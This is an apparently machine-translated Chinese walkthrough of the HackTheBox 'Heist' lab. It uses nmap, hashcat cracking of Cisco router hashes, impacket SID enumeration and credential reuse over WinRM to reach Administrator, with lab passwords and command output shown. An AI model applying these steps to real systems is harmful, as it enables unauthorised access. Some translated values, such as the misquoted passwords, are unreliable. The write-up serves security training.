首要是运行Nmap来查找主机上正在运行的服务。

# Nmap 7.70 scan initiated Wed Aug 14 21:08:24 2019 as: nmap -A -p- -oN scan 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.031s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-14 21:11:09
|_  start_date: N/A
TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   30.76 ms 10.10.12.1
2   30.86 ms 10.10.10.149
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 14 21:11:47 2019 -- 1 IP address (1 host up) scanned in 204.15 seconds

从输出中可以看到,我们有很多服务正在运行。我探索的第一个端口是80。我浏览到http://10.10.10.149,并看到以下内容:

当您选择以访客身份登录时,将显示一个称为危险的用户与支持管理员之间的聊天记录。危险已将以下cisco路由器配置附加到该消息。

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100synchronizationbgp log-neighbor-changesbgp dampeningnetwork 192.168.0.0Â mask 300.255.255.0timers bgp 3 9redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4session-timeout 600authorization exec SSHtransport input ssh

从此配置文件中,我们可以收集2个用户名admin和rout3r。还有3个哈希。通过使用此网站,我们可以查找密码7的哈希值。秘密5散列需要破解。我是用hashcat针对rockyou单词表来做到这一点的。

james@james-PC:~/Downloads$ hashcat -a 0 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' /home/james/Downloads/rockyou.txt -m 500 --force
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent              Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Wed Aug 21 14:39:16 2019 (5 mins, 21 secs)
Time.Estimated...: Wed Aug 21 14:44:37 2019 (0 secs)
Guess.Base.......: File (/home/james/Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:     9353 H/s (12.68ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3543552/14344384 (24.70%)
Rejected.........: 0/3543552 (0.00%)
Restore.Point....: 3543040/14344384 (24.70%)
Candidates.#1....: steauar2 -> steakcheese
HWMon.Dev.#1.....: N/A
Started: Wed Aug 21 14:39:13 2019
Stopped: Wed Aug 21 14:44:37 2019

从输出中可以看到。已从哈希中恢复了密码secretth1agent。

接下来,我移至端口135。这正在运行msrpc,但需要重定向才能访问。我从impacket下载了一个名为lookupsid.py的脚本。这使您可以通过msrpc连接并枚举计算机上的用户。一番尝试和错误后,我发现我可以使用从端口80上的网页收集的用户名危险进行连接。并且密码被hashcat破解。

root@kali://root/Downloads# python lookupsid.py Hazard@10.10.10.149
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
root@kali://root/Downloads#

现在,我们还有3个用户。support , Chase和Jason。然后,我继续查看端口5985。它正在运行名为winrm的服务。这用于Windows远程管理。可以使用winrm_shell.rb的工具在远程但是,这确实需要在用户名和密码变量中输入并能进行连接。通过更多的反复试验。尝试在上一步中找到的凭证的不同组合,我能够使用ruby脚本登录,并Q4)sJu\Y8qz*A3?d密码。用户可以从这里访问机器,并能够导航到Chase用户的桌面并捕获用户标志。

root@kali://root/Downloads# ruby winrm_shell.rb
PS > whoami
supportdesk\chase
PS > ls   Directory: C:\Users\Chase\Documents                                                                              [40/1506]Mode                LastWriteTime         Length Name                                                                         ----                -------------         ------ ----                                                                         -a----        8/21/2019   9:01 PM         605970 a.dmp                                                                        -a----        8/21/2019   9:34 PM         562841 PowerUp.ps1                                                                  -a----        8/21/2019   9:36 PM          73802 shell.exe                                                                    PS > pwd                                                                                                                      Path
----
C:\Users\Chase\Documents                                                                                                      PS > cd ..
PS > ls                                                                                                                       Directory: C:\Users\Chase                                                                                                 Mode                LastWriteTime         Length Name                                                                         ----                -------------         ------ ----                                                                         d-r---        4/22/2019   7:14 AM                3D Objects                                                                   d-r---        4/22/2019   7:14 AM                Contacts
d-r---        4/22/2019   6:10 PM                Desktop
d-r---        8/21/2019   9:36 PM                Documents
d-r---        4/22/2019   7:14 AM                Downloads
d-r---        4/22/2019   7:14 AM                Favorites
d-r---        4/22/2019   7:14 AM                Links
d-r---        4/22/2019   7:14 AM                Music
d-r---        4/22/2019   7:14 AM                Pictures
d-r---        4/22/2019   7:14 AM                Saved Games
d-r---        4/22/2019   7:14 AM                Searches
d-r---        4/22/2019   7:14 AM                Videos
PS > cd Desktop
PS > lsDirectory: C:\Users\Chase\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt
PS > more user.txt
[REDACTED]

接下来,我开始环顾机器,以寻找提升权限的方法。我导航到C:\ inetpub \ wwwroot以查找IIS服务器上托管的所有其他文件。我查看了login.php文件,发现其底部是SHA256哈希和电子邮件地址,用于登录网站时进行身份验证。

PS > ls                                                                                                                       Directory: C:\inetpub\wwwroot                                                                                             Mode                LastWriteTime         Length Name                                                                         ----                -------------         ------ ----                                                                         d-----        4/21/2019   5:41 PM                attachments                                                                  d-----        4/21/2019   5:41 PM                css                                                                          d-----        4/21/2019   5:41 PM                images                                                                       d-----        4/21/2019   5:41 PM                js                                                                           -a----        4/21/2019  11:51 AM           1240 errorpage.php                                                                -a----        4/21/2019  11:33 AM            279 index.php                                                                    -a----        4/22/2019   8:38 AM           3034 issues.php                                                                   -a----        4/22/2019   6:48 AM           2657 login.php                                                                    PS > more login.php
</body>
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {               if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {$_SESSION['admin'] = "valid";header('Location: issues.php');}elseheader('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {if( $_GET['guest'] === 'true' ) {$_SESSION['guest'] = "valid";header('Location: issues.php');}
}
?>
</html>

我将哈希值输入THIS网站以尝试查找其值并成功。返回密码4dD!5} x / re8] FBuZ。然后,我退出了powershell会话,并修改了winrm_shell.rb脚本以使用此密码以管理员身份登录。这已成功登录,我能够导航到Administrator用户上的Desktop并收集根标志。

root@kali://root/Downloads# ruby t.rb
PS > whoami
supportdesk\administrator
PS > lsDirectory: C:\Users\Administrator\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   8:24 AM            343 chase.ps1
PS > pwd
Path
----
C:\Users\Administrator\Documents
PS > cd ../Desktop
PS > lsDirectory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:05 AM             32 root.txt
PS > more root.txt
[REDACTED]
PS >

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

实战HackTheBox里的Heist相关推荐

  1. Python基础入门:从0完成一个宝可梦数据分析实战-Task4-阿里云天池

    Python基础入门:从0完成一个宝可梦数据分析实战-Task4-阿里云天池 〇.整体的学习感受 本篇数据分析实战的文案写得十分接地气,以一个大家都耳熟能详的卡通游戏ID作为范本素材,并且将数据分析的 ...

  2. http抓包实战 pdf_抓包实战 | 浏览器里的HTTP请求到底是如何完成的?

    来源丨木木匠 my.oschina.net/luozhou/blog/3003053 文中很多细节就是面试时关于"网络"这一块所常问的,还是得多积累一点 概   览 上一篇文章&l ...

  3. 对HackTheBox里面的Netmon进行攻破

    废话不多说直接执行Nmap扫描的第一步是查看计算机正在运行的服务类型: nmap -p- -sV -O 10.10.10.152 Starting Nmap 7.70 ( https://nmap.o ...

  4. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  5. python小项目案例-拯救Python新手的几个项目实战

    原标题:拯救Python新手的几个项目实战 Python 做小游戏 实例一:24点游戏 项目名称:经典趣味24点游戏程序设计(python) 实例二:五子棋游戏 python学习关注我们企鹅qun: ...

  6. 双服务器架构实战飞桨部署-自动上色和老相片修复

    双服务器架构实战飞桨部署-自动上色和老相片修复 宋 朱熹 <即事有怀寄彦辅仲宗二兄>诗之二:"闻说双飞桨,翩然下广津. 飞桨功能强大,部署非常简单方便(对我这个不熟练的人,并不是 ...

  7. PCA(主成分分析-principal components analysis)学习笔记以及源代码实战讲解

    PCA(主成分分析-principal components analysis)学习笔记以及源代码实战讲解 文章目录 PCA(主成分分析-principal components analysis)学 ...

  8. hackthebox的网站使用教程

    Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获 ...

  9. Unity手游实战:从0开始SLG——逻辑与表现分离以及实战ECS架构和优化

    这是侑虎科技第612篇文章,感谢作者放牛的星星供稿.欢迎转发分享,未经作者授权请勿转载.如果您有任何独到的见解或者发现也欢迎联系我们,一起探讨.(QQ群:793972859) 作者主页:https:/ ...

最新文章

  1. 低级键盘钩子,在WIN7以上版本的问题
  2. Oracle数据库之PL/SQL
  3. --save 和--save-dev的区别
  4. 动态规划求解限时采药问题(洛谷P1048题题解,Java语言描述)
  5. 思科3560交换机端口限速
  6. 问题三十:《Ray Tracing In One Weekend》封面图形生成
  7. 高并发系统数据幂等性
  8. mysql高可用架构 - MHA简介-01
  9. 7.UNIX 环境高级编程--进程环境
  10. VM虚拟机系统时间同步网络时间并登录用户自动校正时间
  11. python可视化计算器_Python tkinter实现简单加法计算器代码实例
  12. 如何利用445端口进行入侵渗透 445端口入侵原因详细解析。大家在进行入侵渗透个人电脑的时候,经常会碰到各种各样的端口,比如135,1433,445,3306等端口,现在小编就给大家讲解下445端口如
  13. RGB灯串24键红外遥控控制器芯片 SOP-8氛围灯小夜灯单片机芯片方案开发
  14. C#wmp.dll自动注册失败
  15. Unity官方中文版(有生之年终于等到了)
  16. mysql python 2.7.14_python 2.7.14安装包下载|
  17. 我的2013拾遗总结~ 多么痛的领悟!
  18. Go语言自学系列 | go语言数字类型
  19. 如何高效地为室友电脑清理 C 盘?
  20. 微信链接跳转浏览器实现微信中直接下载棋牌游戏类APP功能

热门文章

  1. ubuntu无法打开中文输入法
  2. 智能硬件产品工装开发全流程
  3. 考研英语,这些名师你必须知道!
  4. Python计算机视觉编程学习笔记 七 图像搜索
  5. 当前主要使用的python版本_李白:高楼当此夜,叹息未应闲。全诗赏析
  6. log4j.appender.console.layout.ConversionPattern详解
  7. DDS(Date-Distribution Service)协议解读和测试解决方案
  8. 计算机英语面试题,计算机软件专业考研英语面试必备问题解析
  9. 领英高级会员之个人商务会员(LinkedIn Premium Business)值得购买吗?
  10. 如何给结构体内声明的二维数组赋值